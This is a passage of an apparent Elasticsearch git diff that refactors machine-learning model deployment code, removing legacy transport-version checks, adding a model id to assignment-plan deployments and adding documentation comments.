org.elasticsearch.xpack.core.ml.action.InferTrainedModelDeploymentAction; import org.elasticsearch.xpack.core.ml.inference.results.ErrorInferenceResults; @@ -37,11 +39,14 @@ public class TransportInferTrainedModelDeploymentAction extends TransportTasksAc InferTrainedModelDeploymentAction.Response, InferTrainedModelDeploymentAction.Response> { + private final ThreadPool threadPool; + @Inject public TransportInferTrainedModelDeploymentAction( ClusterService clusterService, TransportService transportService, - ActionFilters actionFilters + ActionFilters actionFilters, + ThreadPool threadPool ) { super( InferTrainedModelDeploymentAction.NAME, @@ -52,6 +57,7 @@ public TransportInferTrainedModelDeploymentAction( InferTrainedModelDeploymentAction.Response::new, EsExecutors.DIRECT_EXECUTOR_SERVICE ); + this.threadPool = threadPool; } @Override @@ -99,6 +105,9 @@ protected void taskOperation( // and return order the results to match the request order AtomicInteger count = new AtomicInteger(); AtomicArray results = new AtomicArray<>(nlpInputs.size()); + + var contextPreservingListener = 
ContextPreservingActionListener.wrapPreservingContext(listener, threadPool.getThreadContext()); + int slot = 0; for (var input : nlpInputs) { task.infer( @@ -109,7 +118,7 @@ protected void taskOperation( request.getPrefixType(), actionTask, request.isChunkResults(), - orderedListener(count, results, slot++, nlpInputs.size(), listener) + orderedListener(count, results, slot++, nlpInputs.size(), contextPreservingListener) ); } } diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/correlation/BucketCorrelationAggregationBuilder.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/correlation/BucketCorrelationAggregationBuilder.java index 74a3a3c561334..38619fce5ff0d 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/correlation/BucketCorrelationAggregationBuilder.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/correlation/BucketCorrelationAggregationBuilder.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.ml.aggs.correlation; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.pipeline.BucketHelpers; @@ -138,6 +137,6 @@ public int hashCode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/inference/InferencePipelineAggregationBuilder.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/inference/InferencePipelineAggregationBuilder.java index f2bb12b13e30f..3f9d2fd4b8061 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/inference/InferencePipelineAggregationBuilder.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/inference/InferencePipelineAggregationBuilder.java @@ -9,7 +9,6 @@ import org.apache.lucene.util.SetOnce; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.client.internal.Client; import org.elasticsearch.common.Strings; @@ -381,6 +380,6 @@ public boolean equals(Object obj) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/kstest/BucketCountKSTestAggregationBuilder.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/kstest/BucketCountKSTestAggregationBuilder.java index 3742d88374dd1..1173fbdcbf5e5 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/kstest/BucketCountKSTestAggregationBuilder.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/kstest/BucketCountKSTestAggregationBuilder.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.ml.aggs.kstest; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.core.Nullable; @@ -186,6 +185,6 @@ public int hashCode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git 
a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentClusterService.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentClusterService.java index b359daebd5368..9d516fb3e1a74 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentClusterService.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentClusterService.java @@ -11,8 +11,6 @@ import org.apache.logging.log4j.Logger; import org.elasticsearch.ElasticsearchStatusException; import org.elasticsearch.ResourceNotFoundException; -import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.ActionRequestValidationException; import org.elasticsearch.action.support.master.AcknowledgedResponse; @@ -79,9 +77,6 @@ public class TrainedModelAssignmentClusterService implements ClusterStateListene private static final Logger logger = LogManager.getLogger(TrainedModelAssignmentClusterService.class); - private static final TransportVersion RENAME_ALLOCATION_TO_ASSIGNMENT_TRANSPORT_VERSION = TransportVersions.V_8_3_0; - public static final TransportVersion DISTRIBUTED_MODEL_ALLOCATION_TRANSPORT_VERSION = TransportVersions.V_8_4_0; - private final ClusterService clusterService; private final ThreadPool threadPool; private final NodeLoadDetector nodeLoadDetector; @@ -169,14 +164,6 @@ public void clusterChanged(ClusterChangedEvent event) { return; } - if (eventStateMinTransportVersionIsBeforeDistributedModelAllocationTransportVersion(event)) { - // we should not try to rebalance assignments while there may be nodes running on a version - // prior to introducing distributed model allocation. - // But we should remove routing to removed or shutting down nodes. 
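The deletions in TrainedModelAssignmentClusterService above all retire one recurring pattern: branching on whether the cluster's minimum transport version predates the 8.3 allocation-to-assignment rename or the 8.4 distributed-model-allocation change. Once every wire-compatible release is past 8.4.0, the "before" branch is unreachable and can be removed wholesale. A schematic sketch of the retired gate follows; ClusterSnapshot and the numeric constant are illustrative stand-ins (the real types are ClusterState and TransportVersion), only the shape of the check comes from the code above.

// Illustrative only: the shape of the version gate this PR deletes.
record ClusterSnapshot(int minTransportVersionId) {}

final class VersionGateSketch {
    // Hypothetical id standing in for TransportVersions.V_8_4_0.
    static final int DISTRIBUTED_MODEL_ALLOCATION = 8_040_099;

    /**
     * Before this PR: skip rebalancing while any node in the cluster speaks a wire
     * protocol older than the 8.4 distributed-allocation change. After this PR the
     * check is gone because no supported wire version is older.
     */
    static boolean canRebalanceAssignments(ClusterSnapshot state) {
        return state.minTransportVersionId() >= DISTRIBUTED_MODEL_ALLOCATION;
    }
}

Deleting such a guard is safe exactly when the oldest version the cluster can negotiate is already past the constant, which is what makes these branches dead code now.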
- removeRoutingToRemovedOrShuttingDownNodes(event); - return; - } - if (event.nodesAdded()) { logMlNodeHeterogeneity(); } @@ -203,10 +190,6 @@ public void clusterChanged(ClusterChangedEvent event) { } } - boolean eventStateMinTransportVersionIsBeforeDistributedModelAllocationTransportVersion(ClusterChangedEvent event) { - return event.state().getMinTransportVersion().before(DISTRIBUTED_MODEL_ALLOCATION_TRANSPORT_VERSION); - } - boolean eventStateHasGlobalBlockStateNotRecoveredBlock(ClusterChangedEvent event) { return event.state().blocks().hasGlobalBlock(GatewayService.STATE_NOT_RECOVERED_BLOCK); } @@ -400,18 +383,6 @@ public void createNewModelAssignment( CreateTrainedModelAssignmentAction.Request request, ActionListener listener ) { - if (clusterService.state().getMinTransportVersion().before(DISTRIBUTED_MODEL_ALLOCATION_TRANSPORT_VERSION)) { - listener.onFailure( - new ElasticsearchStatusException( - "cannot create new assignment [{}] for model [{}] while cluster upgrade is in progress", - RestStatus.CONFLICT, - request.getTaskParams().getDeploymentId(), - request.getTaskParams().getModelId() - ) - ); - return; - } - if (MlMetadata.getMlMetadata(clusterService.state()).isResetMode()) { listener.onFailure( new ElasticsearchStatusException( @@ -522,13 +493,11 @@ private static ClusterState update(ClusterState currentState, TrainedModelAssign private static ClusterState forceUpdate(ClusterState currentState, TrainedModelAssignmentMetadata.Builder modelAssignments) { logger.debug(() -> format("updated assignments: %s", modelAssignments.build())); + ProjectMetadata.Builder builder = ProjectMetadata.builder(currentState.metadata().getProject()); - if (currentState.getMinTransportVersion().onOrAfter(RENAME_ALLOCATION_TO_ASSIGNMENT_TRANSPORT_VERSION)) { - builder.putCustom(TrainedModelAssignmentMetadata.NAME, modelAssignments.build()) - .removeCustom(TrainedModelAssignmentMetadata.DEPRECATED_NAME); - } else { - builder.putCustom(TrainedModelAssignmentMetadata.DEPRECATED_NAME, modelAssignments.buildOld()); - } + builder.putCustom(TrainedModelAssignmentMetadata.NAME, modelAssignments.build()) + .removeCustom(TrainedModelAssignmentMetadata.DEPRECATED_NAME); + return ClusterState.builder(currentState).putProjectMetadata(builder).build(); } @@ -844,7 +813,7 @@ private void updateDeployment( } boolean hasUpdates = hasUpdates(numberOfAllocations, adaptiveAllocationsSettingsUpdates, existingAssignment); if (hasUpdates == false) { - logger.info("no updates"); + logger.debug("no updates to be made for deployment [{}]", deploymentId); listener.onResponse(existingAssignment); return; } @@ -858,19 +827,9 @@ private void updateDeployment( ); return; } - if (clusterState.getMinTransportVersion().before(DISTRIBUTED_MODEL_ALLOCATION_TRANSPORT_VERSION)) { - listener.onFailure( - new ElasticsearchStatusException( - "cannot update deployment with model id [{}] while cluster upgrade is in progress.", - RestStatus.CONFLICT, - deploymentId - ) - ); - return; - } - ActionListener updatedStateListener = ActionListener.wrap( - updatedState -> submitUnbatchedTask("update model deployment", new ClusterStateUpdateTask() { + ActionListener updatedAssignmentListener = ActionListener.wrap( + updatedAssignment -> submitUnbatchedTask("update model deployment", new ClusterStateUpdateTask() { private volatile boolean isUpdated; @@ -878,7 +837,7 @@ private void updateDeployment( public ClusterState execute(ClusterState currentState) { if (areClusterStatesCompatibleForRebalance(clusterState, currentState)) { isUpdated = true; - 
return updatedState; + return update(currentState, updatedAssignment); } logger.debug(() -> format("[%s] Retrying update as cluster state has been modified", deploymentId)); updateDeployment(currentState, deploymentId, numberOfAllocations, adaptiveAllocationsSettings, isInternal, listener); @@ -910,7 +869,7 @@ public void clusterStateProcessed(ClusterState oldState, ClusterState newState) listener::onFailure ); - updateAssignment(clusterState, existingAssignment, numberOfAllocations, adaptiveAllocationsSettings, updatedStateListener); + updateAssignment(clusterState, existingAssignment, numberOfAllocations, adaptiveAllocationsSettings, updatedAssignmentListener); } static boolean hasUpdates( @@ -944,7 +903,7 @@ private void updateAssignment( TrainedModelAssignment assignment, Integer numberOfAllocations, AdaptiveAllocationsSettings adaptiveAllocationsSettings, - ActionListener listener + ActionListener listener ) { threadPool.executor(MachineLearning.UTILITY_THREAD_POOL_NAME).execute(() -> { if (numberOfAllocations == null || numberOfAllocations == assignment.getTaskParams().getNumberOfAllocations()) { @@ -961,13 +920,13 @@ private void updateAndKeepNumberOfAllocations( ClusterState clusterState, TrainedModelAssignment assignment, AdaptiveAllocationsSettings adaptiveAllocationsSettings, - ActionListener listener + ActionListener listener ) { TrainedModelAssignment.Builder updatedAssignment = TrainedModelAssignment.Builder.fromAssignment(assignment) .setAdaptiveAllocationsSettings(adaptiveAllocationsSettings); TrainedModelAssignmentMetadata.Builder builder = TrainedModelAssignmentMetadata.builder(clusterState); builder.updateAssignment(assignment.getDeploymentId(), updatedAssignment); - listener.onResponse(update(clusterState, builder)); + listener.onResponse(builder); } private void increaseNumberOfAllocations( @@ -975,7 +934,7 @@ private void increaseNumberOfAllocations( TrainedModelAssignment assignment, int numberOfAllocations, AdaptiveAllocationsSettings adaptiveAllocationsSettings, - ActionListener listener + ActionListener listener ) { try { TrainedModelAssignment.Builder updatedAssignment = TrainedModelAssignment.Builder.fromAssignment(assignment) @@ -995,7 +954,7 @@ private void increaseNumberOfAllocations( ) ); } else { - listener.onResponse(update(clusterState, rebalancedMetadata)); + listener.onResponse(rebalancedMetadata); } } catch (Exception e) { listener.onFailure(e); @@ -1007,7 +966,7 @@ private void decreaseNumberOfAllocations( TrainedModelAssignment assignment, int numberOfAllocations, AdaptiveAllocationsSettings adaptiveAllocationsSettings, - ActionListener listener + ActionListener listener ) { TrainedModelAssignment.Builder updatedAssignment = numberOfAllocations < assignment.totalTargetAllocations() ? 
new AllocationReducer(assignment, nodeAvailabilityZoneMapper.buildMlNodesByAvailabilityZone(clusterState)).reduceTo( @@ -1022,7 +981,7 @@ private void decreaseNumberOfAllocations( } TrainedModelAssignmentMetadata.Builder builder = TrainedModelAssignmentMetadata.builder(clusterState); builder.updateAssignment(assignment.getDeploymentId(), updatedAssignment); - listener.onResponse(update(clusterState, builder)); + listener.onResponse(builder); } static ClusterState setToStopping(ClusterState clusterState, String deploymentId, String reason) { diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentNodeService.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentNodeService.java index c86b3e710a736..83db62e2da4de 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentNodeService.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentNodeService.java @@ -375,12 +375,9 @@ public void clusterChanged(ClusterChangedEvent event) { final boolean isResetMode = MlMetadata.getMlMetadata(event.state()).isResetMode(); TrainedModelAssignmentMetadata modelAssignmentMetadata = TrainedModelAssignmentMetadata.fromState(event.state()); final String currentNode = event.state().nodes().getLocalNodeId(); - final boolean isNewAllocationSupported = event.state() - .getMinTransportVersion() - .onOrAfter(TrainedModelAssignmentClusterService.DISTRIBUTED_MODEL_ALLOCATION_TRANSPORT_VERSION); final Set shuttingDownNodes = Collections.unmodifiableSet(event.state().metadata().nodeShutdowns().getAllNodeIds()); - if (isResetMode == false && isNewAllocationSupported) { + if (isResetMode == false) { updateNumberOfAllocations(modelAssignmentMetadata); } @@ -388,7 +385,7 @@ public void clusterChanged(ClusterChangedEvent event) { RoutingInfo routingInfo = trainedModelAssignment.getNodeRoutingTable().get(currentNode); if (routingInfo != null) { // Add new models to start loading if the assignment is not stopping - if (isNewAllocationSupported && trainedModelAssignment.getAssignmentState() != AssignmentState.STOPPING) { + if (trainedModelAssignment.getAssignmentState() != AssignmentState.STOPPING) { if (shouldAssignmentBeRestarted(routingInfo, trainedModelAssignment.getDeploymentId())) { prepareAssignmentForRestart(trainedModelAssignment); } diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentRebalancer.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentRebalancer.java index 20cbdaecaa222..90f86dbc243f0 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentRebalancer.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentRebalancer.java @@ -130,19 +130,15 @@ private static AssignmentPlan mergePlans( return finalPlanBuilder.build(); } - private static void copyAssignments( - AssignmentPlan source, - AssignmentPlan.Builder dest, - Map originalNodeById - ) { - for (AssignmentPlan.Deployment m : source.deployments()) { - Map nodeAssignments = source.assignments(m).orElse(Map.of()); - for (Map.Entry assignment : nodeAssignments.entrySet()) { - AssignmentPlan.Node originalNode = originalNodeById.get(assignment.getKey().id()); - dest.assignModelToNode(m, originalNode, 
assignment.getValue()); - // As the node has all its available memory we need to manually account memory of models with - // current allocations. - dest.accountMemory(m, originalNode); + /** + * Transfers assignments from the source AssignmentPlan to the destination AssignmentPlan.Builder. + */ + static void copyAssignments(AssignmentPlan source, AssignmentPlan.Builder dest, Map originalNodeById) { + for (AssignmentPlan.Deployment deployment : source.deployments()) { + Map sourceNodeAssignments = source.assignments(deployment).orElse(Map.of()); + for (Map.Entry sourceAssignment : sourceNodeAssignments.entrySet()) { + AssignmentPlan.Node node = originalNodeById.get(sourceAssignment.getKey().id()); + dest.assignModelToNode(deployment, node, sourceAssignment.getValue()); } } } @@ -169,6 +165,7 @@ private AssignmentPlan computePlanForNormalPriorityModels( .collect(Collectors.toMap(Map.Entry::getKey, e -> e.getValue().getTargetAllocations())); return new AssignmentPlan.Deployment( assignment.getDeploymentId(), + assignment.getModelId(), assignment.getTaskParams().getModelBytes(), assignment.getTaskParams().getNumberOfAllocations(), assignment.getTaskParams().getThreadsPerAllocation(), @@ -185,6 +182,7 @@ private AssignmentPlan computePlanForNormalPriorityModels( planDeployments.add( new AssignmentPlan.Deployment( taskParams.getDeploymentId(), + taskParams.getModelId(), taskParams.getModelBytes(), taskParams.getNumberOfAllocations(), taskParams.getThreadsPerAllocation(), @@ -225,6 +223,7 @@ private AssignmentPlan computePlanForLowPriorityModels(Set assignableNod .map( assignment -> new AssignmentPlan.Deployment( assignment.getDeploymentId(), + assignment.getModelId(), assignment.getTaskParams().getModelBytes(), assignment.getTaskParams().getNumberOfAllocations(), assignment.getTaskParams().getThreadsPerAllocation(), @@ -242,6 +241,7 @@ private AssignmentPlan computePlanForLowPriorityModels(Set assignableNod planDeployments.add( new AssignmentPlan.Deployment( taskParams.getDeploymentId(), + taskParams.getModelId(), taskParams.getModelBytes(), taskParams.getNumberOfAllocations(), taskParams.getThreadsPerAllocation(), @@ -298,9 +298,7 @@ private Map, List> createNodesByZoneMap() { nodes.add( new AssignmentPlan.Node( discoveryNode.getId(), - // We subtract native inference memory as the planner expects available memory for - // native inference including current assignments. 
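The copyAssignments rewrite above also drops the trailing dest.accountMemory(m, originalNode) call; the surrounding changes suggest that assignModelToNode now performs the memory accounting itself, so the manual second pass would double-count. A condensed standalone sketch of the transfer idiom, with plain records and maps standing in for AssignmentPlan, its Builder, Node, and Deployment:

import java.util.HashMap;
import java.util.Map;

// Plain stand-ins for AssignmentPlan.Node and AssignmentPlan.Deployment.
record PlanNode(String id) {}
record PlanDeployment(String deploymentId) {}

final class CopyAssignmentsSketch {
    /** Replays every (deployment, node) -> allocations entry of a source plan onto a destination. */
    static void copyAssignments(
        Map<PlanDeployment, Map<PlanNode, Integer>> source,
        Map<PlanDeployment, Map<PlanNode, Integer>> dest,
        Map<String, PlanNode> originalNodeById
    ) {
        for (var deploymentEntry : source.entrySet()) {
            for (var nodeEntry : deploymentEntry.getValue().entrySet()) {
                // Re-resolve the node by id: the source plan may hold modified copies of the node objects.
                PlanNode original = originalNodeById.get(nodeEntry.getKey().id());
                dest.computeIfAbsent(deploymentEntry.getKey(), d -> new HashMap<>())
                    .merge(original, nodeEntry.getValue(), Integer::sum);
                // No separate accountMemory step here: the real builder is assumed to
                // account memory inside assignModelToNode itself after this change.
            }
        }
    }
}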
- getNodeFreeMemoryExcludingPerNodeOverheadAndNativeInference(load), + load.getFreeMemoryExcludingPerNodeOverhead(), MlProcessors.get(discoveryNode, allocatedProcessorsScale).roundUp() ) ); @@ -317,10 +315,6 @@ private Map, List> createNodesByZoneMap() { })); } - private static long getNodeFreeMemoryExcludingPerNodeOverheadAndNativeInference(NodeLoad load) { - return load.getFreeMemoryExcludingPerNodeOverhead() - load.getAssignedNativeInferenceMemory(); - } - private TrainedModelAssignmentMetadata.Builder buildAssignmentsFromPlan(AssignmentPlan assignmentPlan) { TrainedModelAssignmentMetadata.Builder builder = TrainedModelAssignmentMetadata.Builder.empty(); for (AssignmentPlan.Deployment deployment : assignmentPlan.deployments()) { diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AbstractPreserveAllocations.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AbstractPreserveAllocations.java index 66b8d9e570211..8a0bbe2ecdd5e 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AbstractPreserveAllocations.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AbstractPreserveAllocations.java @@ -55,6 +55,7 @@ Deployment modifyModelPreservingPreviousAssignments(Deployment m) { return new Deployment( m.deploymentId(), + m.modelId(), m.memoryBytes(), m.allocations() - calculatePreservedAllocations(m), m.threadsPerAllocation(), @@ -69,7 +70,7 @@ Deployment modifyModelPreservingPreviousAssignments(Deployment m) { AssignmentPlan mergePreservedAllocations(AssignmentPlan assignmentPlan) { // As the model/node objects the assignment plan are the modified ones, // they will not match the models/nodes members we have in this class. - // Therefore, we build a lookup table based on the ids, so we can merge the plan + // Therefore, we build a lookup table based on the ids so we can merge the plan // with its preserved allocations. final Map, Integer> plannedAssignmentsByDeploymentNodeIdPair = new HashMap<>(); for (Deployment d : assignmentPlan.deployments()) { @@ -84,6 +85,7 @@ AssignmentPlan mergePreservedAllocations(AssignmentPlan assignmentPlan) { AssignmentPlan.Builder mergedPlanBuilder = AssignmentPlan.builder(nodes, deployments); for (Node n : nodes) { + // TODO (#101612) Should the first loop happen in the builder constructor? 
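For the merge step above, the key trick is matching by id rather than by object identity, since mergePreservedAllocations sees modified Deployment and Node instances. A tiny sketch of building such a (deploymentId, nodeId) lookup table; the real code keys the map with a pair type, approximated here with Map.Entry so the snippet stays standalone:

import java.util.AbstractMap.SimpleImmutableEntry;
import java.util.HashMap;
import java.util.Map;

final class PairLookupSketch {
    /** Indexes planned allocations by (deploymentId, nodeId) so modified copies still match by id. */
    static Map<Map.Entry<String, String>, Integer> indexByIdPair(Map<String, Map<String, Integer>> allocationsByDeploymentThenNode) {
        Map<Map.Entry<String, String>, Integer> byIdPair = new HashMap<>();
        allocationsByDeploymentThenNode.forEach(
            (deploymentId, byNode) -> byNode.forEach(
                (nodeId, allocations) -> byIdPair.put(new SimpleImmutableEntry<>(deploymentId, nodeId), allocations)
            )
        );
        return byIdPair;
    }
}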
for (Deployment deploymentAllocationsToPreserve : deployments) { // if the model m is already allocated on the node n and I want to preserve this allocation diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlan.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlan.java index c294e7b2de792..a90a8cb9d5262 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlan.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlan.java @@ -47,6 +47,7 @@ public class AssignmentPlan implements Comparable { */ public record Deployment( String deploymentId, + String modelId, long memoryBytes, int allocations, int threadsPerAllocation, @@ -59,6 +60,7 @@ public record Deployment( ) { public Deployment( String deploymentId, + String modelId, long modelBytes, int allocations, int threadsPerAllocation, @@ -70,6 +72,7 @@ public Deployment( ) { this( deploymentId, + modelId, modelBytes, allocations, threadsPerAllocation, @@ -96,7 +99,7 @@ boolean hasEverBeenAllocated() { public long estimateMemoryUsageBytes(int allocations) { return StartTrainedModelDeploymentAction.estimateMemoryUsageBytes( - deploymentId, + modelId, memoryBytes, perDeploymentMemoryBytes, perAllocationMemoryBytes, @@ -106,24 +109,23 @@ public long estimateMemoryUsageBytes(int allocations) { long estimateAdditionalMemoryUsageBytes(int allocationsOld, int allocationsNew) { return StartTrainedModelDeploymentAction.estimateMemoryUsageBytes( - deploymentId, + modelId, memoryBytes, perDeploymentMemoryBytes, perAllocationMemoryBytes, allocationsNew ) - StartTrainedModelDeploymentAction.estimateMemoryUsageBytes( - deploymentId, + modelId, memoryBytes, perDeploymentMemoryBytes, perAllocationMemoryBytes, allocationsOld ); - } long minimumMemoryRequiredBytes() { return StartTrainedModelDeploymentAction.estimateMemoryUsageBytes( - deploymentId, + modelId, memoryBytes, perDeploymentMemoryBytes, perAllocationMemoryBytes, @@ -221,23 +223,43 @@ public int compareTo(AssignmentPlan o) { return Comparator.comparing(AssignmentPlan::computeQuality).compare(this, o); } + /** + * Checks whether all deployments in the current {@link AssignmentPlan} have at least as many + * allocations as currently assigned. + */ public boolean satisfiesCurrentAssignments() { return deployments().stream().allMatch(this::isSatisfyingCurrentAssignmentsForModel); } + /** + * Checks whether the current assignments for a given {@link Deployment} meet its allocation requirements. + * + * It ensures that the total number of allocations assigned to the deployment across all nodes is + * at least equal to the deployment's current assigned allocations. + */ private boolean isSatisfyingCurrentAssignmentsForModel(Deployment m) { if (m.currentAllocationsByNodeId().isEmpty()) { return true; } Map nodeAssignments = assignments.get(m); - int currentAllocations = nodeAssignments.values().stream().mapToInt(Integer::intValue).sum(); - return currentAllocations >= m.getCurrentAssignedAllocations(); + int inPlanAssignedAllocations = nodeAssignments.values().stream().mapToInt(Integer::intValue).sum(); + return inPlanAssignedAllocations >= m.getCurrentAssignedAllocations(); } - public boolean satisfiesAllocations(Deployment m) { - return remainingModelAllocations.getOrDefault(m, 0) == 0; + /** + * Checks if the current assignments satisfy the deployment's allocation requirements. 
+ * @param deployment the deployment to check + * @return true if the current assignments satisfy the deployment's allocation requirements, false otherwise + */ + public boolean satisfiesAllocations(Deployment deployment) { + return remainingModelAllocations.getOrDefault(deployment, 0) == 0; } + /** + * Checks if the current assignments satisfy all deployments' allocation requirements. This means that + * each deployment has no remaining allocations left to assign. + * @return true if the current assignments satisfy the deployments' allocation requirements, false otherwise + */ public boolean satisfiesAllModels() { return deployments().stream().allMatch(this::satisfiesAllocations); } @@ -447,7 +469,7 @@ public Builder assignModelToNode(Deployment deployment, Node node, int allocatio ); } - assignments.get(deployment).compute(node, (n, remAllocations) -> remAllocations + allocations); + assignments.get(deployment).compute(node, (n, assignedAllocations) -> assignedAllocations + allocations); accountMemory(deployment, node, requiredMemory); if (deployment.priority == Priority.NORMAL) { @@ -458,24 +480,10 @@ public Builder assignModelToNode(Deployment deployment, Node node, int allocatio } private int getAssignedAllocations(Deployment deployment, Node node) { - int currentAllocations = getCurrentAllocations(deployment, node); - int assignmentAllocations = assignments.get(deployment).get(node); - return currentAllocations + assignmentAllocations; - } - - private static int getCurrentAllocations(Deployment m, Node n) { - return m.currentAllocationsByNodeId.containsKey(n.id()) ? m.currentAllocationsByNodeId.get(n.id()) : 0; - } - - public void accountMemory(Deployment m, Node n) { - if (m.currentAllocationsByNodeId().containsKey(n.id())) { - int allocations = m.currentAllocationsByNodeId().get(n.id()); - long requiredMemory = m.estimateMemoryUsageBytes(allocations); - accountMemory(m, n, requiredMemory); - } + return assignments.get(deployment).get(node); } - private void accountMemory(Deployment m, Node n, long requiredMemory) { + public void accountMemory(Deployment m, Node n, long requiredMemory) { remainingNodeMemory.computeIfPresent(n, (k, v) -> v - requiredMemory); if (remainingNodeMemory.containsKey(n) && remainingNodeMemory.get(n) < 0) { throw new IllegalArgumentException("not enough memory on node [" + n.id() + "] to assign model [" + m.deploymentId() + "]"); diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlanner.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlanner.java index 8b33a9fd54fad..bb7998035ff46 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlanner.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlanner.java @@ -60,13 +60,26 @@ public AssignmentPlan computePlan() { return computePlan(true); } - public AssignmentPlan computePlan(boolean tryAssigningPreviouslyAssignedModels) { + /** + * Computes an {@link AssignmentPlan} for the given nodes and deployments. + * If {@code tryAssigningAllPreviouslyAllocatedModels} is true, then the plan will + * attempt to assign at least one allocation to previously assigned models. 
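Restated in miniature, the refactored computePlan now reads as: keep the plan that satisfies current assignments if it covers all previously assigned models or the caller opted out of the fallback; otherwise solve again forcing at least one allocation each and pick by plan quality. A schematic of that selection, with Plan and the two solvers as stand-ins; the real tie-breaking in AssignmentPlanner has additional detail elided by the hunk:

import java.util.function.Supplier;

interface Plan extends Comparable<Plan> {
    boolean arePreviouslyAssignedModelsAssigned();
}

final class PlannerSelectionSketch {
    static Plan computePlan(
        boolean tryAssigningAllPreviouslyAllocatedModels,
        Supplier<Plan> solveSatisfyingCurrentAssignments,
        Supplier<Plan> solveAllocatingAtLeastOnce
    ) {
        Plan current = solveSatisfyingCurrentAssignments.get();
        if (current.arePreviouslyAssignedModelsAssigned() || tryAssigningAllPreviouslyAllocatedModels == false) {
            return current; // nothing was dropped, or the caller opted out of the best-effort fallback
        }
        // Try to rescue any deployment that would otherwise drop to zero allocations.
        Plan fallback = solveAllocatingAtLeastOnce.get();
        return fallback.compareTo(current) >= 0 ? fallback : current; // pick by plan quality
    }
}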
